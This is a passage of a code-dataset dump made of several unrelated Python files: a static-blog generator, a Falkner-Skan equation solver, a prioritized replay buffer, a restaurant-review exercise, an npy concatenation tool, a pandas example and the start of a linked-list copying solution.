self.post_num):#这里不需要-1,因为下面已经有j = i-1,否则在列表最后一个排不到\r\n key = self.arr[i] \r\n j = i-1 \r\n while j>=0 and key.date.replace(\"-\", \"\").replace(\":\", \"\").replace(\" \", \"\") > self.arr[j].date.replace(\"-\", \"\").replace(\":\", \"\").replace(\" \", \"\"):\r\n self.arr[j+1] = self.arr[j]\r\n j-=1\r\n self.arr[j+1] = key\r\n \r\n self.sitemap() #生成sitemap.txt文件\r\n \r\n \"\"\"最近文章\"\"\"\r\n self.Recent_posts()\r\n \r\n \"\"\"置顶\"\"\"\r\n topArr = list()\r\n top = self.post_num - 1\r\n while top>=0:\r\n if(self.arr[top].topping.replace(\" \", \"\") == \"Yes\"):\r\n topArr.insert(0,self.arr[top]) #插入到列表topArr中\r\n del (self.arr[top]) #删除列表arr中该元素\r\n top -= 1 \r\n self.arr = topArr + self.arr #两个列表合并\r\n del topArr #删除列表topArr\r\n \r\n postsnum = 0 #能显示的有多少\r\n for i in range(self.post_num):\r\n if self.arr[i].is_archive == \"Yes\":\r\n postsnum += 1\r\n self.pages = int( postsnum/(self.articleMax) ) #向下取整\r\n if (self.pages * self.articleMax) < postsnum:\r\n self.pages += 1\r\n print('博客导航有%s页,每页最大含%s篇文章(%s篇非archive显示),合计转换%s篇文章。'%(self.pages, self.articleMax, self.post_num-postsnum, self.post_num))\r\n if(self.pages == 2):\r\n self.is_only2page = True #判断一开始就是不是只有两个页面\r\n \r\n \r\n \"\"\"\r\n if self.post_num == len_md:\r\n pass\r\n else:\r\n for i in range(thread_num):\r\n self.thread_srtarr[i].first = i* self.post_num//thread_num\r\n 
self.thread_srtarr[i].last = (i+1)*self.post_num//thread_num\r\n \"\"\"\r\n \r\n \"\"\"多线程渲染网页\r\n if self.post_num>=35: \r\n for i in range(thread_num):\r\n thread_list.append( threading.Thread( target=self.parse_main, args=( self.thread_srtarr[i] , str(i)) ) )\r\n for i in range(thread_num):\r\n thread_list[i].start()\r\n for i in range(thread_num):\r\n thread_list[i].join()\r\n else:\r\n for j in range(self.post_num): \r\n self.parse_to_HTML(j, \"Main\") \r\n \"\"\"\r\n \r\n \"\"\"单线程渲染网页\"\"\"\r\n for j in range(self.post_num): \r\n self.parse_to_HTML(j, \"Main\")\r\n \r\n \r\n for i in range(self.post_num-1,-1, -1): #倒序删除符合条件的元素\r\n if self.arr[i].is_archive != \"Yes\":\r\n del ( self.arr[i] )\r\n self.post_num = len(self.arr) \r\n \r\n \"\"\"生成目录\"\"\"\r\n self.Create_archive()\r\n \r\n \"\"\"删除各个结点\"\"\"\r\n thread_list.clear()\r\n self.thread_srtarr.clear()\r\n self.arr.clear()\r\n \r\n return True \r\n\r\n\r\n \r\n\r\nif __name__ == \"__main__\":\r\n \r\n start = time.time()\r\n \"\"\"---------------------------------------------------------------------------------\"\"\"\r\n source = \"raw\" #文章源\r\n output_ALL = \"_public\" #输出地址总文件夹\r\n output_DETAIL = \"posts\" #输出地址具体的文件夹 _public/posts\r\n output_PAGE = \"pages\" #输出地址分页文件夹 _public/pages\r\n output_RECENTPOSTS = \"extra\"\r\n dir_template = \"template/NEW\" #模板源\r\n \r\n isDIR(output_ALL)\r\n \r\n outfilePATH = \"{}/{}\".format(output_ALL, output_DETAIL) #_public/posts\r\n isDIR(outfilePATH)\r\n \r\n outfilePAGE = \"{}/{}\".format(output_ALL, output_PAGE) #_public/pages\r\n isDIR(outfilePAGE) \r\n \r\n outfileRECENT = \"{}/{}\".format(output_ALL, output_RECENTPOSTS) #_public/extra\r\n isDIR(outfileRECENT)\r\n \r\n \"\"\"-------------------------生成站点页首-----------------------------------------------------\"\"\"\r\n \"\"\"类别category有:life, work, study, exam, trip\"\"\"\r\n site_name = \"\" #博客名称\r\n site_url = \"\" #博客网址\r\n page_MaxNum = 12 #页面显示最大数量\r\n \r\n md = md2html(source, site_name, site_url, page_MaxNum, output_ALL, output_DETAIL, output_PAGE, output_RECENTPOSTS)\r\n md.Main(dir_template)\r\n del md\r\n \r\n \"\"\"------------------------------------------------------------------------------------\"\"\"\r\n print(\"程序总用时%s秒\"%(time.time()-start) )\r\n \r\n \"\"\"记录运行时间戳-----------------------------------------------------------------------\"\"\"\r\n #https://zhuanlan.zhihu.com/p/45113970 \r\n File_io(\"work.log\", \"a\", \"utf-8\",\\\r\n DATA = \"worklog:{}\\n\".format( \\\r\n time.strftime( '%Y.%m.%d.%H:%M:%S', time.localtime(start) ) \\\r\n ) \\\r\n ) \r\n","repo_name":"qing2zijin/staticblog","sub_path":"blog.py","file_name":"blog.py","file_ext":"py","file_size_in_byte":29522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17745662318","text":"#!/bin/python3\n\"\"\"----------------------------------------------------------------------------\nNumerical solution of Falkner-Skan wedge flow equation using\nfinite difference method\n----------------------------------------------------------------------------\"\"\"\n\n# importing needed modules\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom copy import copy as cp\nimport os\n\n# defining computation parameters----------------------------------------------\nm_values = [2,1,0.6,0.3,0,-0.05,-0.08]\neta_max = 10.0\nN_eta = 201\n\nN_iteration = 101\ntolerance = 1e-6\n\ndn = eta_max/(N_eta-1)\n\n# computation variables definition---------------------------------------------\nf_list = 
[]; z_list = []\n\nf = np.zeros(N_eta)\n# z = np.zeros(N_eta)\n\n# applying initial and boundary conditions\nf[0] = 0\n# z[0] = 0\n# z[N_eta-1] = 1.0\nz = np.linspace(0,1.0,N_eta)\neta = np.linspace(0,eta_max,N_eta)\n\n# solution begin---------------------------------------------------------------\nfor m in m_values:\n # reinitializing conditions\n f = np.zeros(N_eta)\n z = np.linspace(0,1.0,N_eta)\n for itr in range(N_iteration):\n # marching the f equation from lower boundary\n for i in range(N_eta-1):\n f[i+1] = f[i] + 0.5*(z[i]+z[i+1])*dn\n\n # solving iteratively the z equation\n z_prev = cp(z)\n\n for j in range(1000):\n for i in range(1,N_eta-1):\n # computing coefficients\n ai = 2/dn**2 + m*z[i]\n bi = 1/dn**2 + (m+1)/4/dn*f[i]\n ci = 1/dn**2 - (m+1)/4/dn*f[i]\n di = cp(m)\n\n # solving equation\n z[i] = 1/ai*(bi*z[i+1] + ci*z[i-1]+di)\n # convergence check\n convergence = np.max(np.abs(z_prev - z))\n z_prev = cp(z)\n if convergence < tolerance:\n break\n\n # status update\n print(\"m = \",m,\"; iteration : \", itr,\"; z iteration : \",j,\n \"; z convergence = \",convergence)\n f_list.append(f)\n z_list.append(z)\n\n# post processing section------------------------------------------------------\n# obtaining computation variables\nf_d_list = z_list\nf_dd_list = []\n\n# computing f_double dash\nf_dd = np.zeros(N_eta)\nfor i in range(len(f_d_list)):\n z = f_d_list[i]\n f_dd = np.zeros(N_eta)\n for j in range(1,N_eta-1):\n f_dd[j] = (z[j+1] - z[j-1])/dn/2.0\n # linear interpolation on boundaries\n f_dd[0] = 2*f_dd[1] - f_dd[2]\n f_dd[N_eta-1] = 2*f_dd[N_eta-2] - f_dd[N_eta-3]\n\n print(\"name=\",i,\"\\n\",f_dd)\n\n # appending to list\n f_dd_list.append(f_dd)\n\n# preparing dataframe to store computed values to csv\n# refreshing storage directory\nos.system(\"rm -rf tables_csv && mkdir tables_csv\")\n# looping through each m_values\nfor i in range(len(m_values)):\n # preparing data frame\n fid = pd.DataFrame(np.transpose([eta,f_list[i],f_d_list[i],f_dd_list[i]]),\n columns=[\"eta\",\"f\",\"g\",\"h\"])\n # preparing filename\n fname = \"tables_csv/data_table_m=\"+str(m_values[i])+\".csv\"\n # writing to csv\n fid.to_csv(fname, index = None)\n\n\nplt.figure()\nfor i in range(len(m_values)):\n plt.plot(z_list[i],eta,label='m = '+str(m_values[i]))\nplt.grid()\nplt.legend()\nplt.xlabel(\"$u/u_e$\")\nplt.ylabel(\"$\\eta$\")\nplt.title(r\"$u/u_e$ vs $\\eta$\")\nplt.savefig(\"plot_1.png\", dpi = 150)\n\nplt.figure()\nfor i in range(len(m_values)):\n plt.plot(eta/2*z_list[i],eta,label='m = '+str(m_values[i]))\nplt.grid()\nplt.legend()\nplt.xlabel(r\"$\\left(v \\sqrt{Re_x}\\right)/u_e$\")\nplt.ylabel(r\"$\\eta$\")\nplt.title(r\"$\\left(v \\sqrt{Re_x}\\right)/u_e$ vs $\\eta$\")\nplt.savefig(\"plot_2.png\", dpi = 150)\n\nplt.show()\n","repo_name":"Ramkumar47/ComputationalCodes","sub_path":"09_NumericalSolution_of_FalknerSkan_equation/04_documentation/supporting_documents/02_question_2_and_3_codeDevelopment/01_FDM/script_FDM.py","file_name":"script_FDM.py","file_ext":"py","file_size_in_byte":3654,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"25131630253","text":"# This code is based on code from OpenAI baselines. 
(https://github.com/openai/baselines)\nimport numpy as np\nimport random\n\nfrom common.segment_tree_sb import SumSegmentTree, MinSegmentTree\n\n\nclass ReplayBuffer(object):\n def __init__(self, size):\n self._storage = []\n self._maxsize = size\n self._next_idx = 0\n self.demo_len = 0\n\n def __len__(self):\n return len(self._storage)\n\n def add(self, obs_t, action, reward, obs_tp1, done, is_demo, obs_tpn=None, reward_n=None, done_n=None):\n data = (obs_t, action, reward, obs_tp1, done, is_demo, obs_tpn, reward_n, done_n)\n\n if self._next_idx >= len(self._storage):\n self._storage.append(data)\n elif self._storage[self._next_idx][5]:\n self._next_idx = self.demo_len\n self._storage[self._next_idx] = data\n else:\n self._storage[self._next_idx] = data\n self._next_idx = (self._next_idx + 1) % self._maxsize\n\n def _encode_sample(self, idxes):\n data = self._storage[0]\n ob_dtype = data[0].dtype\n ac_dtype = data[1].dtype\n obses_t, actions, rewards, obses_tp1, dones, is_demos, obses_tpn, rewards_n, dones_n = [], [], [], [], [], [], [], [], []\n for i in idxes:\n data = self._storage[i]\n obs_t, action, reward, obs_tp1, done, is_demo, obs_tpn, reward_n, done_n = data\n obses_t.append(np.array(obs_t, copy=False))\n actions.append(np.array(action, copy=False))\n rewards.append(reward)\n obses_tp1.append(np.array(obs_tp1, copy=False))\n dones.append(done)\n is_demos.append(is_demo)\n # n_step\n obses_tpn.append(np.array(obs_tpn, copy=False))\n rewards_n.append(reward_n)\n dones_n.append(done_n)\n if data[6] is None:\n return np.array(obses_t, dtype=ob_dtype), np.array(actions, dtype=ac_dtype), np.array(rewards, dtype=np.float32), \\\n np.array(obses_tp1, dtype=ob_dtype), np.array(dones, dtype=np.float32), np.array(is_demos, dtype=np.float32), \\\n None, None, None\n else:\n return np.array(obses_t, dtype=ob_dtype), np.array(actions, dtype=ac_dtype), np.array(rewards, dtype=np.float32), \\\n np.array(obses_tp1, dtype=ob_dtype), np.array(dones, dtype=np.float32), np.array(is_demos, dtype=np.float32), \\\n np.array(obses_tpn, dtype=ob_dtype), np.array(rewards_n, dtype=np.float32), np.array(dones_n, dtype=np.float32)\n\n def sample(self, batch_size):\n idxes = [random.randint(0, len(self._storage) - 1) for _ in range(batch_size)]\n return self._encode_sample(idxes)\n\n\nclass PrioritizedReplayBuffer(ReplayBuffer):\n def __init__(self, size, alpha):\n super(PrioritizedReplayBuffer, self).__init__(size)\n assert alpha >= 0\n self._alpha = alpha\n\n it_capacity = 1\n while it_capacity < size:\n it_capacity *= 2\n\n self._it_sum = SumSegmentTree(it_capacity)\n self._it_min = MinSegmentTree(it_capacity)\n self._max_priority = 1.0\n\n def add(self, *args, **kwargs):\n idx = self._next_idx\n super().add(*args, **kwargs)\n self._it_sum[idx] = self._max_priority ** self._alpha\n self._it_min[idx] = self._max_priority ** self._alpha\n\n # def _sample_proportional(self, batch_size):\n # res = []\n # p_total = self._it_sum.sum(0, len(self._storage) - 1)\n # every_range_len = p_total / batch_size\n # for i in range(batch_size):\n # mass = random.random() * every_range_len + i * every_range_len\n # idx = self._it_sum.find_prefixsum_idx(mass)\n # res.append(idx)\n # return res\n\n def _sample_proportional(self, batch_size):\n mass = []\n total = self._it_sum.sum(0, len(self._storage) - 1)\n # TODO(szymon): should we ensure no repeats?\n mass = np.random.random(size=batch_size) * total\n idx = self._it_sum.find_prefixsum_idx(mass)\n return idx\n\n # def sample(self, batch_size, beta):\n # assert beta > 0\n #\n 
# idxes = self._sample_proportional(batch_size)\n #\n # weights = []\n # p_min = self._it_min.min() / self._it_sum.sum()\n # max_weight = (p_min * len(self._storage)) ** (-beta)\n #\n # for idx in idxes:\n # p_sample = self._it_sum[idx] / self._it_sum.sum()\n # weight = (p_sample * len(self._storage)) ** (-beta)\n # weights.append(weight / max_weight)\n # weights = np.array(weights, dtype=np.float32)\n # encoded_sample = self._encode_sample(idxes)\n # return tuple(list(encoded_sample) + [weights, idxes])\n\n def sample(self, batch_size, beta = 0):\n \"\"\"\n Sample a batch of experiences.\n compared to ReplayBuffer.sample\n it also returns importance weights and idxes\n of sampled experiences.\n :param batch_size: (int) How many transitions to sample.\n :param beta: (float) To what degree to use importance weights (0 - no corrections, 1 - full correction)\n :param env: (Optional[VecNormalize]) associated gym VecEnv\n to normalize the observations/rewards when sampling\n :return:\n - obs_batch: (np.ndarray) batch of observations\n - act_batch: (numpy float) batch of actions executed given obs_batch\n - rew_batch: (numpy float) rewards received as results of executing act_batch\n - next_obs_batch: (np.ndarray) next set of observations seen after executing act_batch\n - done_mask: (numpy bool) done_mask[i] = 1 if executing act_batch[i] resulted in the end of an episode\n and 0 otherwise.\n - weights: (numpy float) Array of shape (batch_size,) and dtype np.float32 denoting importance weight of\n each sampled transition\n - idxes: (numpy int) Array of shape (batch_size,) and dtype np.int32 idexes in buffer of sampled experiences\n \"\"\"\n assert beta > 0\n\n idxes = self._sample_proportional(batch_size)\n weights = []\n p_min = self._it_min.min() / self._it_sum.sum()\n max_weight = (p_min * len(self._storage)) ** (-beta)\n p_sample = self._it_sum[idxes] / self._it_sum.sum()\n weights = (p_sample * len(self._storage)) ** (-beta) / max_weight\n weights = np.array(weights, dtype=np.float32)\n encoded_sample = self._encode_sample(idxes)\n return tuple(list(encoded_sample) + [weights, idxes])\n\n # def update_priorities(self, idxes, priorities):\n # assert len(idxes) == len(priorities)\n # for idx, priority in zip(idxes, priorities):\n # assert priority > 0\n # assert 0 <= idx < len(self._storage)\n # self._it_sum[idx] = priority ** self._alpha\n # self._it_min[idx] = priority ** self._alpha\n #\n # self._max_priority = max(self._max_priority, priority)\n\n def update_priorities(self, idxes, priorities):\n \"\"\"\n Update priorities of sampled transitions.\n sets priority of transition at index idxes[i] in buffer\n to priorities[i].\n :param idxes: ([int]) List of idxes of sampled transitions\n :param priorities: ([float]) List of updated priorities corresponding to transitions at the sampled idxes\n denoted by variable `idxes`.\n \"\"\"\n assert len(idxes) == len(priorities)\n assert np.min(priorities) > 0\n assert np.min(idxes) >= 0\n assert np.max(idxes) < len(self._storage)\n self._it_sum[idxes] = priorities ** self._alpha\n self._it_min[idxes] = priorities ** self._alpha\n\n self._max_priority = max(self._max_priority, np.max(priorities))","repo_name":"morikatron/DQfD","sub_path":"replay_buffer.py","file_name":"replay_buffer.py","file_ext":"py","file_size_in_byte":7799,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"24507800457","text":"'''\nImplemente la funcion 
escribir_review(nombre_archivo,usuario,nombre_restaurante,puntaje,review) so that it records a user's review. \n'''\ndef escribir_review(nombre_archivo,usuario,nombre_restaurante,puntaje,review):\n    #usuario1,la hamburguesas de nina,5,deliciosas hamburguesas y la porcion super grande\n    file=open(nombre_archivo,\"a\")\n    file.write(\"\\n\"+usuario+\",\"+nombre_restaurante+\",\"+puntaje+\",\"+review)\n    file.close()\n\n\n\n'''\nImplement the function calcular_promedio_restaurante(nombre_archivo, nombre_restaurante) so that it receives the name of the file with the reviews and the name of a restaurant and returns the restaurant's average rating\n'''\ndef calcular_promedio_restaurante(nombre_archivo, nombre_restaurante):\n    file=open(nombre_archivo,\"r\")\n    #usuario1,la hamburguesas de nina,5,deliciosas hamburguesas y la porcion super grande\n    calificacion_prom=[]\n    for linea in file:\n        usuario,restaurante,puntaje,review = linea.strip(\"\\n\").split(\",\")\n        \n        if restaurante == nombre_restaurante : \n            calificacion_prom.append(int(puntaje))\n    file.close()\n    return sum(calificacion_prom)/len(calificacion_prom)\n    # puntajes=[]\n    # for line in file:\n    # if usuario== line[1]:\n    # puntajes.append(line[2])\n    # puntajes1=int(puntajes)\n    # prom_p=sum(puntajes1)/len(puntajes)\n    # calificacion_prom+=prom_p\n    #return calificacion_prom\n\n\n\n'''\nImplement the function cargar_restaurante_info(archivo_restaurante, archivo_review) that receives the name of the restaurants file and the name of the reviews file and returns a dictionary where the keys are the restaurant names and the associated value is another dictionary \n{\n    \"la hamburguesas de nina\":\n        {\n            \"puntaje\": 4.33,\n            \"ubicacion\":(5,7),\n            \"platos\": ['hamburguesas','papas']\n        },\n    \"picanteria doña ceci\":\n        {\n            \"puntaje\": 4.5,\n            \"ubicacion\":(2,4),\n            \"platos\": ['ceviche','encebollado','bollo']\n        },\n    \"comidas de victor\":\n        {\n            \"puntaje\": 3,\n            \"ubicacion\":(6,7),\n            \"platos\": ['seco de pollo','menestra','bollo']\n        },\n}\n'''\ndef cargar_restaurante_info(archivo_restaurante, archivo_review):\n    fileRestaurantes=open(archivo_restaurante,\"r\")\n    #la hamburguesas de nina,5|7,hamburguesas|papas\n    \n    dic = {}\n    \n    for linea in fileRestaurantes :\n        \n        restaurante,ubicacion,platos = linea.strip(\"\\n\").split(\",\")\n        num1,num2 = ubicacion.split(\"|\")\n        \n        ubicacion = (int(num1),int(num2)) \n\n        platos = platos.split(\"|\")\n        puntaje = calcular_promedio_restaurante(archivo_review,restaurante)\n        \n        dic[restaurante]=dic.get(restaurante,{\"puntaje\":puntaje,\"ubicacion\":ubicacion,\"platos\":platos})\n        \n    return dic\n    \n    \n    \n    \n    \n    # dic_restaurantes={}\n    # for data in file1:\n    # data.strip(\"\\n\").split(\",\")\n    # restaurante=data[0]\n    # coordenadas=(data[1])\n    # platos=(data[2]).split(\"|\")\n    # for info in file2:\n    # info.strip(\"\\n\").split(\",\")\n    # puntaje=info[2]\n    # # see the comment\n    # dic_restaurantes[\"restaurante\"]=dic_restaurantes.get(restaurante,{\"puntaje\":puntaje,\"ubicacion\":coordenadas,\"platos\":platos})\n    # return dic_restaurantes\n\n\n\n'''\nImplement the function generar_reporte_plato(dic_restaurantes, nombre_plato) that receives the dictionary with the restaurant information and the name of a dish and generates a file with the names of the restaurants that offer the dish along with their average rating. 
The name of the generated file is nombre_plato.txt\n'''\ndef generar_reporte_plato(dic_restaurantes, nombre_plato):\n    file=open(nombre_plato+\".txt\",\"w\")\n    \n    for nombre_r,info_r in dic_restaurantes.items():\n        if (nombre_plato in info_r[\"platos\"]) :\n            file.write(nombre_r+\",\"+str(info_r[\"puntaje\"])+\"\\n\")\n    \n    # plato_r=dic_restaurantes[\"restaurante\"][\"platos\"]\n    # puntaje_r=dic_restaurantes[\"restaurante\"][\"puntaje\"]\n    # if nombre_plato == plato_r:\n    # file.write(nombre_r,puntaje_r)\n    file.close()\n\n\n'''\nImplement the function criticos_destacados(archivo_reviews) that receives the reviews file and prints on screen the names of the three users who have written the most reviews. \n'''\ndef criticos_destacados(archivo_reviews):\n    file=open(archivo_reviews,\"r\")\n    dic = {}\n    for linea in file :\n        usuario,restaurante,puntaje,review = linea.strip(\"\\n\").split(\",\")\n        dic[usuario] = dic.get(usuario,0)\n        dic[usuario]+=1\n    lista_tuplas = list(dic.items())\n    # sort users by review count (descending) and keep the top three\n    lista_tuplas.sort(key=lambda par: par[1], reverse=True)\n    lista_orden = lista_tuplas[:3]\n    \n    print(lista_orden)\n    \n    \n    # usuario=[]\n    # for line in file:\n    # line.strip(\"\\n\").split(\"|\")\n    # usuario_f=line[0]\n    # for data in file:\n    # usuario_nf=data[0]\n    # if usuario_f == usuario_nf:\n    # usuario.append(usuario_nf)\n\nARCHIVO_REVIEW = \"reviews.txt\"\nARCHIVO_RESTAURANTE = \"restaurantes.txt\"\n\n# testing\n\n#escribir_review(ARCHIVO_REVIEW , \"David\", \"los arbolitos\",'5',\"muy rico \")\n\n#prom = calcular_promedio_restaurante(ARCHIVO_REVIEW,'la hamburguesas de nina')\n#print(prom)\n\n#dic = cargar_restaurante_info(ARCHIVO_RESTAURANTE,ARCHIVO_REVIEW)\n#print(dic)\n\n#generar_reporte_plato(dic,\"menestra\")\n\ncriticos_destacados(ARCHIVO_REVIEW)\n\n\n\n\n# opcion = \"\"\n# while opcion!=\"4\":\n#     print(\"1. register review\")\n#     print(\"2. recommend a restaurant\")\n#     print(\"3. top critics\")\n#     print(\"4. 
exit\")\n#     opcion = input(\"enter option: \")\n#     if opcion==\"1\":\n#         print(\"Register review\")\n#         nombre_usuario=input(\"enter user name: \")\n#         nombre_restaurante=input(\"enter restaurant name: \")\n#         puntaje=input(\"enter rating: \")\n#         review=input(\"enter review: \")\n#         f_review=escribir_review(\"reviews.txt\",nombre_usuario,nombre_restaurante,puntaje,review)\n#         # TODO: REGISTER THE REVIEW\n\n#     elif opcion==\"2\":\n#         print(\"Dish report\")\n#         # ASK THE USER FOR THE NAME OF THE DISH THEY WANT THE REPORT FOR AND GENERATE THE REPORT\n#         plato_nombre=input(\"Enter dish name: \")\n#         reporte_plato=generar_reporte_plato(dic_restaurantes,plato_nombre)\n    \n#     elif opcion==\"3\":\n#         print(\"Top critics\")\n#         # SHOW THE NAMES OF THE TOP CRITICS\n#         print(criticos_destacados(\"reviews.txt\"))\n\n#     else:\n#         print(\"exit\")\n","repo_name":"davidperjac/ayudantias","sub_path":"3 SEMANA/mainEliana.py","file_name":"mainEliana.py","file_ext":"py","file_size_in_byte":6378,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"32544807608","text":"#!/usr/bin/env python3\nimport sys\nimport io\nimport shutil\nimport argparse\nimport logging\n\nimport numpy as np\n\nERRNO_ARGS = 1\nERRNO_READ = 2\nERRNO_DATA = 4\nERRNO_WRITE = 8\nERRNO_INT = 130\n\nerrno = 0\n\nLOGGING_LEVEL = logging.WARNING\n\n\nclass ArgumentParser(argparse.ArgumentParser):\n    def error(self, message):\n        self.print_usage(sys.stderr)\n        args = {'prog': self.prog, 'message': message}\n        self.exit(ERRNO_ARGS, '{prog}: error: {message}\\n'.format(**args))\n\n\ndef make_parser():\n    parser = ArgumentParser(\n        prog='npycat',\n        description='Concatenate or stack several npy files to one npy file.')\n    parser.add_argument(\n        '-s',\n        '--stack',\n        action='store_true',\n        help='stack arrays rather than concatenate them')\n    parser.add_argument(\n        '-d',\n        '--dim',\n        type=int,\n        default=0,\n        help=('the dimension to concatenate/stack, default '\n              'to %(default)s'))\n    parser.add_argument(\n        '-O',\n        '--output',\n        metavar='OUTFILE',\n        help=('the result will be written to OUTFILE. If '\n              'not specified, the raw bytes of the result '\n              'array (or text if `-H\' is given) will be '\n              'written to stdout'))\n    parser.add_argument(\n        '-H',\n        '--human-readable',\n        dest='textwrite',\n        action='store_true',\n        help=('write to OUTFILE in text mode. Note that '\n              'error occurs if the underlying array is more '\n              'than 2D'))\n    parser.add_argument(\n        '-T',\n        '--from-file',\n        dest='from_file',\n        metavar='FILE',\n        help=('read filenames to concatenate/stack from FILE; use `-\' '\n              'to denote stdin. In either case the filenames '\n              'should be placed one per line'))\n    parser.add_argument(\n        'npyfiles',\n        nargs='*',\n        metavar='NPYFILE',\n        help=('the npy files to concatenate/stack. '\n              'If none is given here and if `-T\' is provided, then '\n              'the NPYFILEs will be obtained from FILE. '\n              'If neither NPYFILE nor `-T\' is provided, then '\n              'raw bytes of an npy file will be expected from stdin. 
'\n 'If both NPYFILE and `-T\\' are provided, then '\n 'the union of them will be used.'))\n return parser\n\n\ndef decide_input_files(args):\n global errno\n filenames = []\n if args.from_file == '-':\n filenames.extend(x.rstrip('\\n') for x in sys.stdin)\n if not filenames and not args.npyfiles:\n logging.info('nothing to load; aborted')\n sys.exit(errno)\n elif args.from_file:\n try:\n with open(args.from_file) as infile:\n filenames.extend(x.rstrip('\\n') for x in infile)\n except OSError as err:\n logging.warning('failed to load NPYFILEs from \"%s\" due to %s',\n args.from_file, err)\n errno |= ERRNO_READ\n if not filenames and not args.npyfiles:\n logging.info('nothing to load; aborted')\n sys.exit(errno)\n if args.npyfiles:\n filenames.extend(args.npyfiles)\n return filenames or None\n\n\ndef read_data(filenames):\n all_data = []\n if filenames:\n for filename in filenames:\n try:\n data = np.load(filename)\n except OSError as err:\n logging.error('failed to load \"%s\" due to %s', filename, err)\n sys.exit(errno | ERRNO_READ)\n if hasattr(data, 'keys'):\n data.close()\n logging.error('failed to load \"%s\" as npy file', filename)\n sys.exit(errno | ERRNO_READ)\n logging.debug('loaded data of shape %s from \"%s\"', data.shape,\n filename)\n all_data.append(data)\n else:\n with io.BytesIO() as cbuf:\n shutil.copyfileobj(sys.stdin.buffer, cbuf)\n cbuf.seek(0)\n try:\n data = np.load(cbuf)\n except OSError as err:\n logging.error('failed to load from \"/dev/stdin\" due to %s',\n err)\n sys.exit(errno | ERRNO_READ)\n if hasattr(data, 'keys'):\n data.close()\n logging.error('failed to load \"/dev/stdin\" as npy file')\n sys.exit(errno | ERRNO_READ)\n logging.debug('loaded data of shape %s from \"/dev/stdin\"',\n data.shape)\n all_data.append(data)\n return all_data\n\n\ndef merge_data(args, all_data):\n if len(all_data) > 1:\n merge = np.stack if args.stack else np.concatenate\n try:\n result = merge(all_data, axis=args.dim)\n except ValueError as err:\n logging.error('failed to %s arrays due to %s',\n 'stack' if args.stack else 'concatenate', err)\n sys.exit(errno | ERRNO_DATA)\n else:\n result = all_data[0]\n logging.debug('result shape = %s', result.shape)\n return result\n\n\ndef write_data(args, result):\n if args.output:\n if args.textwrite:\n try:\n with open(args.output, 'w') as outfile:\n np.savetxt(outfile, result)\n except (OSError, ValueError) as err:\n logging.error('failed to write result to \"%s\" due to %s',\n args.output, err)\n sys.exit(errno | ERRNO_WRITE)\n logging.info('written result to \"%s\"', args.output)\n else:\n try:\n with open(args.output, 'wb') as outfile:\n np.save(outfile, result)\n except OSError as err:\n logging.error('failed to write result to \"%s\" due to %s',\n args.output, err)\n sys.exit(errno | ERRNO_WRITE)\n logging.info('written result to \"%s\"', args.output)\n else:\n if args.textwrite:\n with io.StringIO() as cbuf:\n try:\n np.savetxt(cbuf, result)\n except (OSError, ValueError) as err:\n logging.error(\n 'failed to write result to \"/dev/stdout\" '\n 'due to %s', err)\n sys.exit(errno | ERRNO_WRITE)\n cbuf.seek(0)\n shutil.copyfileobj(cbuf, sys.stdout)\n logging.info('written result to \"/dev/stdout\"')\n else:\n with io.BytesIO() as cbuf:\n np.save(cbuf, result)\n cbuf.seek(0)\n shutil.copyfileobj(cbuf, sys.stdout.buffer)\n logging.info('written result to \"/dev/stdout\"')\n\n\ndef main():\n logging.basicConfig(\n format='%(filename)s: %(levelname)s: %(message)s', level=LOGGING_LEVEL)\n args = make_parser().parse_args()\n filenames = 
decide_input_files(args)\n    logging.debug('input filenames = %s', filenames or '/dev/stdin')\n    all_data = read_data(filenames)\n    if not all_data:\n        logging.debug('loaded nothing; aborted')\n        return\n    result = merge_data(args, all_data)\n    write_data(args, result)\n\n\nif __name__ == '__main__':\n    try:\n        main()\n    except KeyboardInterrupt:\n        logging.warning('written data may have been corrupted due to interrupt')\n        errno |= ERRNO_WRITE | ERRNO_INT\n    except BrokenPipeError:\n        logging.warning('written data may have been corrupted due to broken pipe')\n        sys.stderr.close()\n        errno |= ERRNO_WRITE\n    finally:\n        sys.exit(errno)\n","repo_name":"kkew3/npyzutils","sub_path":"src/npycat.py","file_name":"npycat.py","file_ext":"py","file_size_in_byte":7587,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"12154454347","text":"import pandas\n\nstudent_dict = {  # formatted for pandas -> (key, list)\n    \"student\": [\"Angela\", \"James\", \"Lily\"],\n    \"score\": [56, 76, 98]\n}\n\nstudent_data = pandas.DataFrame(student_dict)\nprint(student_data, \"\\n\")\n\nfor (index, row) in student_data.iterrows():  # .iterrows() taps into row\n    print(row)  # (r)\n    if row.student == \"Angela\":  # searches for student name string\n        print(\"\\n\", row.score, \"\\n\")  # prints score int (a)\n\n# p(r): student    Angela\n# score          56\n# Name: 0, dtype: object\n\n# p(a): 56\n","repo_name":"The-Captain-William/100-Days-Of-Python","sub_path":"day_26_list_comprehension/dictionary_comprehension_with_pandas.py","file_name":"dictionary_comprehension_with_pandas.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"}
+{"seq_id":"32873245811","text":"# Definition for a Node.\nclass Node(object):\n    def __init__(self, x, next=None, random=None):\n        self.val = int(x)\n        self.next = next\n        self.random = random\n\n\nclass Solution(object):\n    \"\"\"\nPlease implement the copyRandomList function, which copies a complex linked list. In a complex linked list, each node\nhas, besides a next pointer to the next node, a random pointer that points to any node in the list or to null.\nInput: head = [[7,null],[13,0],[11,4],[10,2],[1,0]]\nOutput: [[7,null],[13,0],[11,4],[10,2],[1,0]]\nInput: head = [[1,1],[2,1]]\nOutput: [[1,1],[2,1]]\nInput: head = [[3,null],[3,0],[3,null]]\nOutput: [[3,null],[3,0],[3,null]]\nInput: head = []\nOutput: []\nExplanation: the given linked list is empty (a null pointer), so return null.\n-10000 <= Node.val <= 10000\nNode.random is null or points to a node in the list. The number of nodes does not exceed 1000.\nNote: this problem is the same as problem 138 on the main site: https://leetcode-cn.com/problems/copy-list-with-random-pointer/\nLink: https://leetcode-cn.com/problems/fu-za-lian-biao-de-fu-zhi-lcof\n    \"\"\"\n    def 